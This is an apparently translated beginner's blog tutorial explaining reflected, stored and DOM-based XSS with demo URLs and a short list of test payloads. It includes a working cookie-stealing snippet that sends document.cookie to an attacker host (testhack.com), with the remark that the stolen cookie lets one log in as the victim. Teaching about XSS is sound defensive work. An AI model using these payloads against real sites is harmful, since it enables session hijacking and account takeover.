Learning web security from scratch (1)

Learning web security from scratch (1)

I have always been interested in web security, but I have always understood a little bit. I decided to learn about web security from now on and update the web Security Series. The content of this article is written by the author while learning. Thank you for your reference.

Typical web attacks include xss, csrf, and interface hijacking. Okay, it's all completely unknown. Let's start with xss. This article is based on xss. The content is relatively simple. If you are familiar with xss, you can skip this article and follow the instructions of the author to continue to learn xss ~~

XSS Overview

Cross Site Scripting (XSS) is the most common vulnerability in Web applications. An attacker embeds a client script (such as JavaScript) in a webpage. When a user browses the webpage, the script is executed in the browser of the user to achieve the target of the attacker. for example, attackers can obtain users' cookies, navigate to malicious websites, and carry Trojans.

XSS Category 1: reflected XSS

Reflected XSS, also known as non-persistent XSS. This attack method is called reflective XSS because the injection code of this attack method is "reflected" from the target server by means of error information, search results, and so on. The non-persistent XSS attack method is one-time. Attackers can send malicious links containing injection scripts to victims by email. When a victim clicks the link, the injection script is transmitted to the target server, the server then "reflected" the injection script to the victim's browser and executed the script on the browser.

Though reflective XSS is relatively less harmful, it should be the most widely used method in XSS. Well, I have mentioned so many concepts above. It is estimated that I have not learned anything about XSS, and I still don't know what it is. Let's take a look at a simple DEMO:

Assuming that the site http://www.test.com/xss/reflect.php is such a code with XSS vulnerabilities

Because the value of x is output directly without any filtering, you can submit it.

http://www.test.com/xss/reflect.php?x=<script>alert(1)</script>

Such a code is a reflective XSS. Of course, the user who opens this URL is attacked. The attacker has to induce the user to click. After clicking this URL, the script in the script will be triggered. alert is just an example, change the code in it to, for example, sending the user cookie to your own server, so that you can get the cookie of the attacked user on the site www.test.com, and then you can log on smoothly, do all kinds of things .. I will explore the problem of "Payload" later ~~

Type 2: stored XSS

Stored XSS stores user input data on the server. This type of XSS is highly stable and harmful. Stored XSS is also called persistent XSS.

The most typical example is the message board XSS. When a user submits a message containing the XSS code to the database, the content of the message is queried and displayed from the database when the target user views the message board, XSS found in the browser

Code, as normal HTML and JS parsing and execution, thus triggering XSS attacks.

 

Type 3: DOM XSS

The difference between dom xss and reflected XSS and stored XSS is that the XSS code of dom xss does not need to be directly involved in the server's resolution response. The XSS triggers DOM Resolution on the browser, it can be thought of as a client. This type of XSS should be especially noted as a front-end student.

A very simple example:

<script>eval(location.hash.substr(1));</script>

The method for triggering XSS is

http://www.test.com/xssme.html#alert(1)

The whole process has nothing to do with the server. Attackers can easily induce others to click URLs with XSS code to launch attacks. Well, when I first graduated, I didn't agree that I couldn't write eval. Some students still feel confident that they can write eval to ensure that their code is correct. However, if there is an "output point", it means there is a risk, it means there is an additional risk of being XSS! It is better not to write it if it can still be left empty ~

XSS payload

In the demo above, we talked about stealing user cookies, which is a common payload of XSS. What is XSS payload?

After the XSS attack succeeds, attackers can implant malicious scripts on the pages currently browsed by users to control users' browsers. These malicious scripts that have completed various specific functions are called "XSS payload ".

XSS Payload is actually a JavaScript script (or Flash or other rich client scripts). Therefore, XSS Payload can be used for any functions implemented by Javascript scripts.

Let's take a few simple Payload forms. For details, you can check them. There are many:

 

<script>alert(1)</script> '"><script>alert(1)</script>  '" alert(1) ' onmouseover=alert(1) x=' " onmouseover=alert(1) x=" </script><script>alert(1)

<Script> alert (1)

Of course, I just mentioned that these things are useless, and it seems that they do not make sense. later articles will discuss these things slowly. Let's take a look at the previous simple demo of cookie Theft:

 var img = document.createElement('img'); img.src = "http://www.testhack.com/log?" + escape(document.cookie); document.body.appendChild(img);

This is a simple Payload for cookie Theft. In the example of XSS, we just need to change the Code introduced into alert (1) to the above Code, as long as the user is tricked into clicking the URL with XSS code, we will send the cookie test.com to our server testhack.com ~ Get the cookie, and then palapala ~~~

In my understanding, as long as there is no data "Input Point" or "output point", XSS is impossible, but how can a code have no data "Input Point" or "output point ~~ After reading the above brief introduction, you should still feel that your code should be free of any problems, and the code you write is safe. Is that true .. In my learning process, I feel that my code has many problems. I didn't think of many things before ..

This article is just a brief introduction to the basic knowledge of XSS. The subsequent series will share the content for further study. The next article will continue to learn about XSS ~

Not complete to be continued ~~

</Script>